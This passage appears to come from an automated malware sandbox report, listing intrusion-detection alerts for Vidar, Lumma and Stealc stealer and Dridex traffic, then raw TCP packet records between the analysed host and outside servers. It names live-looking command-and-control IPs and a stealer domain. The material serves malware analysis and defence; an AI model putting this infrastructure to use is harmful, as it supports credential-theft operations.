2024-09-27T00:29:13.750357+0200	2054495	ET MALWARE Vidar Stealer Form Exfil	1	192.168.2.6	57915	45.132.206.251	80	TCP
2024-09-27T00:29:13.915740+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	57916	188.114.97.3	443	TCP
2024-09-27T00:29:13.915740+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	57916	188.114.97.3	443	TCP
2024-09-27T00:29:13.930018+0200	2056150	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)	1	192.168.2.6	62300	1.1.1.1	53	UDP
2024-09-27T00:29:14.437520+0200	2056151	ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI)	1	192.168.2.6	57917	104.21.77.130	443	TCP
2024-09-27T00:29:15.087760+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	57917	104.21.77.130	443	TCP
2024-09-27T00:29:15.087760+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	57917	104.21.77.130	443	TCP
2024-09-27T00:29:17.420415+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	57919	172.67.128.144	443	TCP
2024-09-27T00:29:17.420415+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	57919	172.67.128.144	443	TCP
2024-09-27T00:29:34.407536+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	57921	172.67.74.152	80	TCP
2024-09-27T00:29:47.020497+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57926	5.75.211.162	443	TCP
2024-09-27T00:29:48.372023+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57927	5.75.211.162	443	TCP
2024-09-27T00:29:49.792507+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57928	5.75.211.162	443	TCP
2024-09-27T00:29:51.385668+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57929	5.75.211.162	443	TCP
2024-09-27T00:29:52.096771+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.6	57929	TCP
2024-09-27T00:29:52.773148+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57930	5.75.211.162	443	TCP
2024-09-27T00:29:53.477239+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.6	57930	TCP
2024-09-27T00:29:54.775042+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57931	5.75.211.162	443	TCP
2024-09-27T00:29:56.087727+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57932	5.75.211.162	443	TCP
2024-09-27T00:29:59.256056+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.6	57933	5.75.211.162	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 00:28:27.307648897 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:27.307683945 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:27.307818890 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:27.314429045 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:27.314464092 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:27.974406004 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:27.974510908 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.033772945 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.033813953 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.034157038 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.034234047 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.038018942 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.083395004 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.464214087 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.464268923 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.464312077 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.464313030 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.464344025 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.464354038 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.464376926 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.464394093 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.568732023 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.568840981 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.568852901 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.568888903 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.568907022 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.568933010 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.574127913 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.574212074 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.574289083 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.574333906 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.574347019 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.574382067 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.574436903 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.574480057 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.574546099 CEST	57876	443	192.168.2.6	104.102.49.254
Sep 27, 2024 00:28:28.574561119 CEST	443	57876	104.102.49.254	192.168.2.6
Sep 27, 2024 00:28:28.596848011 CEST	57877	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:28.596884012 CEST	443	57877	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:28.597026110 CEST	57877	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:28.597302914 CEST	57877	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:28.597321033 CEST	443	57877	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:29.477478981 CEST	443	57877	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:29.477618933 CEST	57877	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:29.483119011 CEST	57877	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:29.483143091 CEST	443	57877	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:29.483550072 CEST	443	57877	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:29.483705997 CEST	57877	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:29.484107971 CEST	57877	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:29.531395912 CEST	443	57877	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:30.021517992 CEST	443	57877	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:30.021665096 CEST	443	57877	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:30.021789074 CEST	57877	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:30.022923946 CEST	57877	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:30.035058022 CEST	57877	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:30.035084963 CEST	443	57877	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:30.037575006 CEST	57878	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:30.037606001 CEST	443	57878	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:30.037692070 CEST	57878	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:30.037925959 CEST	57878	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:30.037940979 CEST	443	57878	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:30.808636904 CEST	443	57878	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:30.808737993 CEST	57878	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:30.809406042 CEST	57878	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:30.809413910 CEST	443	57878	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:30.811590910 CEST	57878	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:30.811599970 CEST	443	57878	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:31.518213987 CEST	443	57878	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:31.518287897 CEST	443	57878	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:31.518357992 CEST	57878	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:31.518402100 CEST	57878	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:31.518732071 CEST	57878	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:31.518748045 CEST	443	57878	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:31.520802021 CEST	57879	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:31.520839930 CEST	443	57879	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:31.520945072 CEST	57879	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:31.521199942 CEST	57879	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:31.521212101 CEST	443	57879	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:32.181940079 CEST	443	57879	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:32.182085037 CEST	57879	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:32.182742119 CEST	57879	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:32.182748079 CEST	443	57879	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:32.184890985 CEST	57879	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:32.184895992 CEST	443	57879	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:32.881047964 CEST	443	57879	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:32.881072044 CEST	443	57879	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:32.881138086 CEST	443	57879	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:32.881139994 CEST	57879	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:32.881139994 CEST	57879	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:32.881210089 CEST	57879	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:32.881629944 CEST	57879	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:32.881649971 CEST	443	57879	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:32.883508921 CEST	57880	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:32.883562088 CEST	443	57880	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:32.883644104 CEST	57880	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:32.883904934 CEST	57880	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:32.883915901 CEST	443	57880	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:33.571847916 CEST	443	57880	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:33.571933031 CEST	57880	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:33.572698116 CEST	57880	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:33.572705984 CEST	443	57880	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:33.574865103 CEST	57880	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:33.574872971 CEST	443	57880	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:34.275197983 CEST	443	57880	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:34.275226116 CEST	443	57880	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:34.275290966 CEST	443	57880	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:34.275394917 CEST	57880	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:34.275558949 CEST	57880	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:34.275963068 CEST	57880	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:34.275979042 CEST	443	57880	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:34.278333902 CEST	57881	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:34.278387070 CEST	443	57881	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:34.278527021 CEST	57881	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:34.278872013 CEST	57881	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:34.278896093 CEST	443	57881	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:34.929912090 CEST	443	57881	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:34.930020094 CEST	57881	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:34.930921078 CEST	57881	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:34.930932045 CEST	443	57881	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:34.933362961 CEST	57881	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:34.933368921 CEST	443	57881	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:35.643656015 CEST	443	57881	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:35.643734932 CEST	443	57881	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:35.643771887 CEST	57881	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:35.643826008 CEST	57881	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:35.647841930 CEST	57881	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:35.647862911 CEST	443	57881	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:35.744544029 CEST	57882	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:35.744580030 CEST	443	57882	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:35.744653940 CEST	57882	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:35.745073080 CEST	57882	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:35.745080948 CEST	443	57882	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:36.409955978 CEST	443	57882	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:36.410140991 CEST	57882	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:36.410677910 CEST	57882	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:36.410686970 CEST	443	57882	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:36.412738085 CEST	57882	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:36.412744045 CEST	443	57882	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:36.412786007 CEST	57882	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:36.412796021 CEST	443	57882	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:36.720904112 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:36.720952034 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:36.721107006 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:36.721666098 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:36.721682072 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.177726030 CEST	443	57882	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.177799940 CEST	443	57882	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.177947998 CEST	57882	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:37.179073095 CEST	57882	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:37.179090977 CEST	443	57882	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.422492027 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.422760963 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:37.423568010 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:37.423580885 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.425901890 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:37.425910950 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.867738008 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.867764950 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.867782116 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.867799997 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:37.867818117 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.867903948 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:37.867903948 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:37.867912054 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.867953062 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:37.898372889 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.898396969 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.898550987 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:37.898561954 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.898652077 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:37.969427109 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.969461918 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.969530106 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:37.969561100 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:37.969593048 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:37.969610929 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.009124994 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.009150982 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.009224892 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.009252071 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.009270906 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.009293079 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.035042048 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.035060883 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.035145044 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.035172939 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.035218954 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.069152117 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.069179058 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.069258928 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.069288015 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.069339037 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.090764999 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.090791941 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.090881109 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.090907097 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.090925932 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.090950966 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.120510101 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.120528936 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.120704889 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.120732069 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.120788097 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.127022028 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.127038956 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.127129078 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.127135038 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.127178907 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.141901016 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.141925097 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.142015934 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.142024994 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.142069101 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.170069933 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.170089006 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.170264959 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.170291901 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.170341969 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.172653913 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.172669888 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.172795057 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.172805071 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.172863960 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.188394070 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.188416004 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.188502073 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.188519001 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.188550949 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.188569069 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.202174902 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.202193022 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.202272892 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.202280998 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.202326059 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.210948944 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.210967064 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.211020947 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.211028099 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.211086988 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.211117983 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.222634077 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.222650051 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.222728968 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.222738028 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.222795010 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.232615948 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.232633114 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.232696056 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.232705116 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.232744932 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.240060091 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.240077019 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.240159035 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.240180969 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.240223885 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.249322891 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.249350071 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.249425888 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.249445915 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.249458075 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.249485016 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.266488075 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.266514063 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.266592026 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.266618967 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.266666889 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.281021118 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.281054974 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.281167030 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.281193972 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.281239033 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.294837952 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.294862986 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.294934988 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.294955015 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.295003891 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.304033995 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.304052114 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.304178953 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.304192066 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.304239988 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.315439939 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.315471888 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.315558910 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.315566063 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.315612078 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.324100971 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.324126005 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.324244976 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.324259043 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.324309111 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.335170984 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.335195065 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.335333109 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.335345030 CEST	443	57883	5.75.211.162	192.168.2.6
Sep 27, 2024 00:28:38.335422993 CEST	57883	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:28:38.344582081 CEST	443	57883	5.75.211.162	192.168.2.6
